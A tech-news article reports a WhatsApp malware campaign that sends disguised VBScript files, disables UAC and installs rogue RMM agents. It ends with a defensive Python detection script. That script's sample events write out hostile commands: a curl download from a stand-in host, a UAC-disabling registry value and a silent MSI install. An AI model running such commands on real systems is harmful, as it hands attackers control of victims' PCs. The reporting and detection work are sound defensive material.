Global WhatsApp Campaign Uses Fake Business Docs to Deploy Rogue RMM Tools

Cybercriminals are compromising WhatsApp accounts globally to send malicious VBScript files disguised as urgent financial documents, bypassing UAC to hijack PCs.
Image Credit / The Hacker News

A global WhatsApp malware campaign hijacks trusted accounts to distribute malicious VBScripts disguised as business documents, installing rogue RMM tools.

A highly opportunistic cyberespionage and crimeware campaign has begun aggressively exploiting interpersonal trust on consumer messaging platforms. Security researchers at Kaspersky’s Global Research and Analysis Team (GReAT) have uncovered an active, multi-stage malware pipeline actively spreading through WhatsApp Web and WhatsApp Desktop clients.

The threat actors are compromising legitimate WhatsApp accounts and using them to broadcast heavily obfuscated Visual Basic Script (.vbs) attachments directly to the victims’ contact lists. Because the messages originate from a known, trusted coworker or friend, recipients are significantly more likely to bypass traditional security caution. According to investigative tracking, the final payload secretly drops enterprise-grade Remote Monitoring and Management (RMM) software, handing attackers complete, unmonitored administrative access to infected Windows systems.


The Illusion of Administrative Cleanliness

The campaign depends on social engineering tailored for corporate environments. The malicious VBScript attachments are masked with urgent, localized financial titles such as Financial Reports.vbs, Account Statement.vbs, Outstanding Payment List.vbs, and Debt confirmation.vbs.

To maximize its international surface area, the group has localized these filenames into several languages, including Portuguese, French, German, and Malay. Telemetry indicates a highly distributed geographic footprint spanning Brazil, India, Mexico, Singapore, the United Kingdom, Spain, Taiwan, Australia, Russia, and Vietnam, with approximately 80% of current infections concentrated heavily in Malaysia.

The underlying script files are thoroughly packed with junk code and randomized variable definitions to break automated security scanners. Intriguingly, the script bodies also feature extensive comments and metadata explicitly written in simplified Chinese that mimic legitimate Microsoft Windows Update modules, detailing fake certificate validations and deployment logs.

Mechanics of the Windows Script Host Exploit

When a user opens the attachment on a Windows machine, the infection behaves differently depending on how they accessed WhatsApp:

  • WhatsApp Web: The attack relies on the user downloading the asset to their local disk and manually launching it from their browser history or downloads folder.

  • WhatsApp Desktop: The malware triggers directly inside the native application layer. Forensic process trees show that WhatsApp.Root.exe directly spawns WScript.exe (the Windows Script Host utility) to kick off the threat sequence.

Once activated, the initial VBScript constructs a hidden working directory under C:\Users\Public\Documents\ and silently invokes native Windows utilities—like curl.exe and bitsadmin.exe—to fetch secondary payloads from external infrastructure.

The secondary stage deploys two parallel scripts. The first script targets system defenses by executing a looping registry modification aimed at the ConsentPromptBehaviorAdmin value. This effectively silences Windows User Account Control (UAC) warnings, allowing the second script to silently extract a ZIP archive. This archive contains a fully configured installation package for Zoho’s ManageEngine Endpoint Central (UEMSAgent.msi). Utilizing the native msiexec.exe engine, the malware silently provisions the management agent, instantly turning the machine into a slave terminal for the attackers.

Strategic Overlaps and Defenses

While the attack chain heavily mimics behaviors observed in an earlier spring wave, the shift to deploying legitimate, commercial RMM tools represents a calculated effort to blend directly into standard corporate network traffic.

Definitive attribution remains difficult. Although the simplified Chinese annotations within the code suggest a Chinese-speaking operator, Kaspersky researchers emphasize that the operational infrastructure directly overlaps with IP addresses (including 202.61.160[.]201) historically mapped to ValleyRAT and Gh0st RAT activity.

To safeguard corporate endpoints from this messaging threat vector, security teams are urged to enforce strict application control policies. Enterprise networks should block or tightly monitor the execution of script hosts like wscript.exe and cscript.exe within public or untrusted user profiles, while mandating that any unexpected file transfer received over external channels be verified through a secondary medium before execution.
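The chain described above leaves a distinctive trail in endpoint telemetry: WhatsApp.Root.exe spawning a script host, a script host reaching for curl.exe or bitsadmin.exe, a working directory under C:\Users\Public\, the ConsentPromptBehaviorAdmin value being set to 0, and msiexec.exe installing a package from that directory. The following is an added example (not code from the article, Kaspersky, or any vendor) of how a detection engineer might encode those observations as rules over Sysmon-style process-creation and registry events. The event dicts, rule names, field layout, and the exact msiexec command line are this example's own assumptions; the sample events are constructed, not captured telemetry.

```python
"""Detection rules for the WhatsApp-delivered VBScript / rogue RMM chain.

Events are modelled as plain dicts in a Sysmon-like layout (constructed sample
data; the field names and rule names are this example's own assumptions).
"""
import ntpath
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
DOWNLOADERS = {"curl.exe", "bitsadmin.exe"}
# The chain stages its files under the Public profile, which normal users rarely write to.
PUBLIC_PROFILE = re.compile(r"c:\\users\\public\\", re.IGNORECASE)


def _base(path):
    """Lower-cased file name of a Windows path (empty string if missing)."""
    return ntpath.basename(path or "").lower()


def classify_event(event):
    """Return the list of rule names an event triggers (empty if none)."""
    hits = []
    kind = event.get("EventType")
    if kind == "ProcessCreate":
        image = _base(event.get("Image"))
        parent = _base(event.get("ParentImage"))
        cmd = event.get("CommandLine", "")
        # WhatsApp Desktop delivery: the client itself launches Windows Script Host.
        if parent == "whatsapp.root.exe" and image in SCRIPT_HOSTS:
            hits.append("whatsapp_spawns_script_host")
        # Any script host referencing the Public profile. This also covers the
        # WhatsApp Web path, where the parent is a browser rather than WhatsApp.Root.exe.
        if image in SCRIPT_HOSTS and PUBLIC_PROFILE.search(cmd):
            hits.append("script_host_in_public_profile")
        # A script host fetching second-stage payloads with native download utilities.
        if parent in SCRIPT_HOSTS and image in DOWNLOADERS:
            hits.append("script_host_spawns_downloader")
        # msiexec installing a package out of the Public profile (assumed location of
        # the extracted MSI; the article names the directory, not the exact command line).
        if image == "msiexec.exe" and PUBLIC_PROFILE.search(cmd):
            hits.append("msiexec_from_public_profile")
    elif kind == "RegistrySet":
        target = (event.get("TargetObject") or "").lower()
        details = (event.get("Details") or "").lower()
        # UAC admin prompt set to "elevate without prompting" (value 0).
        if target.endswith("\\consentpromptbehavioradmin") and details.endswith("0x00000000)"):
            hits.append("uac_consent_prompt_disabled")
    return hits


def scan(events):
    """Return [(index, rule_names)] for every event that triggers at least one rule."""
    findings = []
    for i, ev in enumerate(events):
        hits = classify_event(ev)
        if hits:
            findings.append((i, hits))
    return findings


# Constructed sample events mirroring the stages described in the article.
SAMPLE_EVENTS = [
    {"EventType": "ProcessCreate", "Image": r"C:\Windows\System32\WScript.exe",
     "ParentImage": r"C:\Users\alice\AppData\Local\WhatsApp\WhatsApp.Root.exe",
     "CommandLine": r'"C:\Windows\System32\WScript.exe" "C:\Users\alice\Downloads\Financial Reports.vbs"'},
    {"EventType": "ProcessCreate", "Image": r"C:\Windows\System32\curl.exe",
     "ParentImage": r"C:\Windows\System32\WScript.exe",
     "CommandLine": r"curl.exe -s -o C:\Users\Public\Documents\stage2.vbs http://example.invalid/s2"},
    {"EventType": "RegistrySet",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin",
     "Details": "DWORD (0x00000000)"},
    {"EventType": "ProcessCreate", "Image": r"C:\Windows\System32\msiexec.exe",
     "ParentImage": r"C:\Windows\System32\WScript.exe",
     "CommandLine": r"msiexec.exe /i C:\Users\Public\Documents\UEMSAgent.msi /qn"},
    # Benign control: ordinary user activity should not trigger anything.
    {"EventType": "ProcessCreate", "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "notepad.exe"},
]

if __name__ == "__main__":
    for idx, rules in scan(SAMPLE_EVENTS):
        ev = SAMPLE_EVENTS[idx]
        print(idx, ev.get("Image") or ev.get("TargetObject"), rules)
```

Each rule is weak on its own (an administrator may legitimately run msiexec, and curl.exe is a stock Windows binary), so the value lies in correlating several of them on one host within a short window; the registry rule in particular should page immediately, since nothing in a managed environment should be setting ConsentPromptBehaviorAdmin to 0 outside change control. For the WhatsApp Web case the parent-process rule never fires, which is why the Public-profile and registry rules are kept independent of it.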

About the Author

Jennifer Sakmufuwo Baba

Jennifer Sakmufuwo Baba is a tech analyst and writer covering artificial intelligence, fintech, and emerging technologies at TechRegard. Based in Nigeria, she's passionate about translating complex tech developments into compelling, accessible stories for diverse audiences. Her work focuses on how technology shapes innovation across Africa and globally.